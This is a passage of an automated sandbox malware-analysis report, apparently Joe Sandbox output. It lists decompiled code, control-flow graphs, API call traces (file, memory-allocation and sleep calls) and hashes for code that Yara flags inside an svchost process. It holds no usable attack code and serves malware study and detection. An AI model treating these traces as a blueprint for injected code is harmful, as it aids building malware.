                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00D7928E
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 537aa1e05649384488e1e4de74cc8a517ee9ffb64f29953a0eee39ed2ebbe3d0
                        • Instruction ID: 06d969cad3772a35a448b74aee3fe3b575c2adef8066131253236172a2a1ea77
                        • Opcode Fuzzy Hash: 537aa1e05649384488e1e4de74cc8a517ee9ffb64f29953a0eee39ed2ebbe3d0
                        • Instruction Fuzzy Hash: 4131CF32600246BFDB219E75CC58BAABBA5FF41310F598528E868971A1F731D860DBB4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00D7A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				intOrPtr _t25;
                        				void* _t26;
                        
                        				_t25 = _a16;
                        				if(_t25 == 0x65 || _t25 == 0x45) {
                        					_t26 = E00D7AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        					goto L9;
                        				} else {
                        					_t34 = _t25 - 0x66;
                        					if(_t25 != 0x66) {
                        						__eflags = _t25 - 0x61;
                        						if(_t25 == 0x61) {
                        							L7:
                        							_t26 = E00D7A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                        						} else {
                        							__eflags = _t25 - 0x41;
                        							if(__eflags == 0) {
                        								goto L7;
                        							} else {
                        								_t26 = E00D7B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        							}
                        						}
                        						L9:
                        						return _t26;
                        					} else {
                        						return E00D7B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                        					}
                        				}
                        			}






                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: df75f856d7dfbd36c160b527e5f4905a5b81d0084c358f888a7a4154378a97b9
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: DB014E3204024EFBCF125E98CC418EE3F22BB58354B9A8515FE1D58031E336C9B1AFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:4.6%
                        Dynamic/Decrypted Code Coverage:2%
                        Signature Coverage:0%
                        Total number of Nodes:592
                        Total number of Limit Nodes:70

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 289 239a320-239a371 call 239af20 NtCreateFile
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02394BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02394BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0239A36D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: 1faba55e7a706caa1e36e6ecd8d408dc17f06807de19b4596b02362565802789
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: 66F0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 292 239a31f-239a336 293 239a33c-239a371 NtCreateFile 292->293 294 239a337 call 239af20 292->294 294->293
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02394BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02394BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0239A36D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 3b77060bc8c2cf7482738aebf48b3f28276a9a3f2242f01aa477d2a88d8d6111
                        • Instruction ID: 5eb20d7995e11f4d36e7ef708f56325256c252feabd29b5b74b398c2c42d0cae
                        • Opcode Fuzzy Hash: 3b77060bc8c2cf7482738aebf48b3f28276a9a3f2242f01aa477d2a88d8d6111
                        • Instruction Fuzzy Hash: 46F0E2B2214149ABCB08CF98DC84CEB77ADFF8C354B15864DFA1D93202D634E8518BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(02394D62,5EB65239,FFFFFFFF,02394A21,?,?,02394D62,?,02394A21,FFFFFFFF,5EB65239,02394D62,?,00000000), ref: 0239A415
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 81dc91db910f46d2b9c8c6668600b28b44de23b09c9a3b6224f470350e5bbe35
                        • Instruction ID: 86df9f2665f13b7c4c51281cebc567e1883bbf71a57100c637e23ee8aceed393
                        • Opcode Fuzzy Hash: 81dc91db910f46d2b9c8c6668600b28b44de23b09c9a3b6224f470350e5bbe35
                        • Instruction Fuzzy Hash: 99F0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158648BE1DA7251D634E9518BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(02394D62,5EB65239,FFFFFFFF,02394A21,?,?,02394D62,?,02394A21,FFFFFFFF,5EB65239,02394D62,?,00000000), ref: 0239A415
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: cb959aebdf63923acd9629abcee283676129e18d704d4a7231004f47e99fce54
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: 88F0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02382D11,00002000,00003000,00000004), ref: 0239A539
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 6d8f00abf55874cd849e874c910542dbf7b590782950aeed96e44bb9d75d0d0d
                        • Instruction ID: 1e660370fa5bf4097031ce20e3aad3f2d3729b2582f9f1afa51184e9e2c2853d
                        • Opcode Fuzzy Hash: 6d8f00abf55874cd849e874c910542dbf7b590782950aeed96e44bb9d75d0d0d
                        • Instruction Fuzzy Hash: CDF0F8B2210218ABCB14DF89DC80EAB77ADAF8C754F118258BE1997281C630E911CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02382D11,00002000,00003000,00000004), ref: 0239A539
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction ID: 8985f31464cba052e8d04f1c1a4d55f218dc08c0f3b8f0e0644d7fe649b93511
                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction Fuzzy Hash: B4F015B2200208ABCB14DF89DC80EAB77ADAF88754F118248BE0997241C630F810CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(02394D40,?,?,02394D40,00000000,FFFFFFFF), ref: 0239A475
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: ce07d04665c10abe001aa1f8b0be1f4b0f375e0df7f22af687c46e08035a5988
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: F9D01776200314ABDB20EB98DC85FA77BADEF48760F154599BA199B242C530FA008AE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f06ef6a9aa02312e982febf64722849f42513be5c7d429c133464aa72efb628d
                        • Instruction ID: cb9606d317c7b2ed077c9eafdf11a60e7b072c6969446f7327b652ff95c4cfcc
                        • Opcode Fuzzy Hash: f06ef6a9aa02312e982febf64722849f42513be5c7d429c133464aa72efb628d
                        • Instruction Fuzzy Hash: FB90026161284542E200A5698C14B0701459BD0343F51C115A0145554CCA5588616565
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e06d08ac0d2db6548b086b7a178b96f0320047f4c472817da166fbce30044e01
                        • Instruction ID: 0c72239f00c5b5cddf6f92772bb4cbc3611d470c385fda892accd789078f7124
                        • Opcode Fuzzy Hash: e06d08ac0d2db6548b086b7a178b96f0320047f4c472817da166fbce30044e01
                        • Instruction Fuzzy Hash: E79002B160204902E140B159840474601459BD0341F51C011A5055554E87998DD576A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 8cc742db304af8d696fad0862f5f0d794eaae2a3a7a7f63aa3c6bdc83ba7d9d0
                        • Instruction ID: 09c6d0c8a59c5547334d5887fcd282e59a0ba1886779baa45ecea3a149614a8a
                        • Opcode Fuzzy Hash: 8cc742db304af8d696fad0862f5f0d794eaae2a3a7a7f63aa3c6bdc83ba7d9d0
                        • Instruction Fuzzy Hash: 609002A174204942E100A1598414B060145DBE1341F51C015E1055554D8759CC52716A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: fe01a0416b0a1355d301f30a04e1a224f710542c2e012a726f0a7936a90c2a81
                        • Instruction ID: 176b7d4d7db6e0e621624db3493bbb031dd1bc490073bb22a5b69f791b330535
                        • Opcode Fuzzy Hash: fe01a0416b0a1355d301f30a04e1a224f710542c2e012a726f0a7936a90c2a81
                        • Instruction Fuzzy Hash: CD900261643086526545F15984045074146ABE0281791C012A1405950C86669856E665
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b1bc2197557e0b72e87347839c436ad3faf2239f1d5233d37046fbad463c808c
                        • Instruction ID: 4455f49b624f55cb1064d975b3e7720de2db2b546fa4192d9b9973f1ff6a1027
                        • Opcode Fuzzy Hash: b1bc2197557e0b72e87347839c436ad3faf2239f1d5233d37046fbad463c808c
                        • Instruction Fuzzy Hash: B890027160204913E111A159850470701499BD0281F91C412A0415558D97968952B165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7ecfdd20874192f78092f368c7bcdaec98d682d0a470d083fca9ce5d6c50405e
                        • Instruction ID: e6eba16675c5276c90be2b58b6acf0c0f9d68227e1bb9d9f56003273937f5337
                        • Opcode Fuzzy Hash: 7ecfdd20874192f78092f368c7bcdaec98d682d0a470d083fca9ce5d6c50405e
                        • Instruction Fuzzy Hash: 7A90027160204902E100A599940864601459BE0341F51D011A5015555EC7A588917175
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 8b9640a7f88df52655d8c350fb611b4dc2d0f62071e45e0f24f84333461bf077
                        • Instruction ID: 985a876de79a5f02e78240cabf39aec826deb2eb99b50a82aede8bd017dfe0a7
                        • Opcode Fuzzy Hash: 8b9640a7f88df52655d8c350fb611b4dc2d0f62071e45e0f24f84333461bf077
                        • Instruction Fuzzy Hash: 1690026961304502E180B159940860A01459BD1242F91D415A0006558CCA5588696365
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 79ab0c1c31426360666b60c241808c210e9c697d7b875e5f5afdbff473895769
                        • Instruction ID: ae552a088380d6bfcf875bbce52122881ea9431855abcc6eee2979575fe77162
                        • Opcode Fuzzy Hash: 79ab0c1c31426360666b60c241808c210e9c697d7b875e5f5afdbff473895769
                        • Instruction Fuzzy Hash: DE90027171218902E110A159C40470601459BD1241F51C411A0815558D87D588917166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0bd7fd05e8c399372051308658b1b0eec8596096a4fa8108430db1ee7d63b27c
                        • Instruction ID: 35c6c50f22b2489efb947818c5069f4200a03668fa61fa9de368de3d66147ebc
                        • Opcode Fuzzy Hash: 0bd7fd05e8c399372051308658b1b0eec8596096a4fa8108430db1ee7d63b27c
                        • Instruction Fuzzy Hash: 7290027160608D42E140B1598404A4601559BD0345F51C011A0055694D97658D55B6A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7bd61cabbbc0d0b1e5592db5cf69cbb2f2ec0f298574e6a34afabb5254594018
                        • Instruction ID: fe7c32d3852c8e8d32b3b2da5e63bf14e70329852c247c610086a1fc022984e1
                        • Opcode Fuzzy Hash: 7bd61cabbbc0d0b1e5592db5cf69cbb2f2ec0f298574e6a34afabb5254594018
                        • Instruction Fuzzy Hash: 5F90027160204D02E180B159840464A01459BD1341F91C015A0016654DCB558A5977E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 24444ef21e1a86b79df5ddb222c8d9c8e0d73ff45103d00d4c94805be964f955
                        • Instruction ID: e406a4ea7580e8856ac2e6765c1cf06ab21db5225c155737e8b8a16a0faa2a33
                        • Opcode Fuzzy Hash: 24444ef21e1a86b79df5ddb222c8d9c8e0d73ff45103d00d4c94805be964f955
                        • Instruction Fuzzy Hash: B890027160204D42E100A1598404B4601459BE0341F51C016A0115654D8755C8517565
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9b13311c4bc23df442d1316662b2421566796d0707011b338a144dc0e44c1aca
                        • Instruction ID: fb9ad64a541da560ed72dea1556880d355abf40437770aea0fe0ed2c08a1fdfa
                        • Opcode Fuzzy Hash: 9b13311c4bc23df442d1316662b2421566796d0707011b338a144dc0e44c1aca
                        • Instruction Fuzzy Hash: 499002716020CD02E110A159C40474A01459BD0341F55C411A4415658D87D588917165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5eed3602fde381944ab4f20b2f28d367f9d04dd9f7b20c825e96ee34b13f4bb6
                        • Instruction ID: a259f89df9d61a595d46d9d87730220000c508ba5cc5116d9e43be8e7e6943ca
                        • Opcode Fuzzy Hash: 5eed3602fde381944ab4f20b2f28d367f9d04dd9f7b20c825e96ee34b13f4bb6
                        • Instruction Fuzzy Hash: CA900475713045031105F55D470450701C7DFD53D1351C031F1007550CD771CC717175
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c95055dc739e5720eae8428d43950dd25a515d44ed23bc9a613ad67ed7b37875
                        • Instruction ID: 26c3874096a4419dc88f9436f3fed5cb15d334817958add9bc1830182a30e2ae
                        • Opcode Fuzzy Hash: c95055dc739e5720eae8428d43950dd25a515d44ed23bc9a613ad67ed7b37875
                        • Instruction Fuzzy Hash: 1F9002A1603045035105B1598414616414A9BE0241B51C021E1005590DC66588917169
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 244 2399040-239906f 245 239907b-2399082 244->245 246 2399076 call 239bd00 244->246 247 2399088-23990d8 call 239bdd0 call 238ace0 call 2394e40 245->247 248 239915c-2399162 245->248 246->245 257 23990e0-23990f1 Sleep 247->257 258 23990f3-23990f9 257->258 259 2399156-239915a 257->259 260 23990fb-2399121 call 2398c60 258->260 261 2399123-2399143 258->261 259->248 259->257 262 2399149-239914c 260->262 261->262 263 2399144 call 2398e70 261->263 262->259 263->262
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 023990E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: 459a28475e4ac7a8502db391e27b3e37a43bf4d0fdafe441200a7263c5343303
                        • Instruction ID: a96bd9c871d6a837d0e4f2f473e4499dabd8d69964886168fcf687529ba4e743
                        • Opcode Fuzzy Hash: 459a28475e4ac7a8502db391e27b3e37a43bf4d0fdafe441200a7263c5343303
                        • Instruction Fuzzy Hash: 6731A1B2500704BBCB24DF64D885F67B7B9BB89B04F00801DF62A9B244D730A610CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 266 2399036-2399038 267 239903a-2399082 call 239bd00 266->267 268 23990b6-23990d8 call 2394e40 266->268 273 2399088-23990b4 call 239bdd0 call 238ace0 267->273 274 239915c-2399162 267->274 277 23990e0-23990f1 Sleep 268->277 273->268 279 23990f3-23990f9 277->279 280 2399156-239915a 277->280 283 23990fb-2399121 call 2398c60 279->283 284 2399123-2399143 279->284 280->274 280->277 285 2399149-239914c 283->285 284->285 286 2399144 call 2398e70 284->286 285->280 286->285
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 023990E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: e4aa825218a6b7ed45a0c1b50daf3f55f6296d5e290d5f93140b0578839debec
                        • Instruction ID: 163b9134253dcfd25820c1d9d04ba72e089c5659f477337592ffe8363e9ff66f
                        • Opcode Fuzzy Hash: e4aa825218a6b7ed45a0c1b50daf3f55f6296d5e290d5f93140b0578839debec
                        • Instruction Fuzzy Hash: 3831D2B2900345ABCF24EF64D8C5B67B7B9FF89B04F10802DE6295B245C774A511CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 295 239a622-239a646 297 239a64c-239a661 RtlFreeHeap 295->297 298 239a647 call 239af20 295->298 298->297
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02383AF8), ref: 0239A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
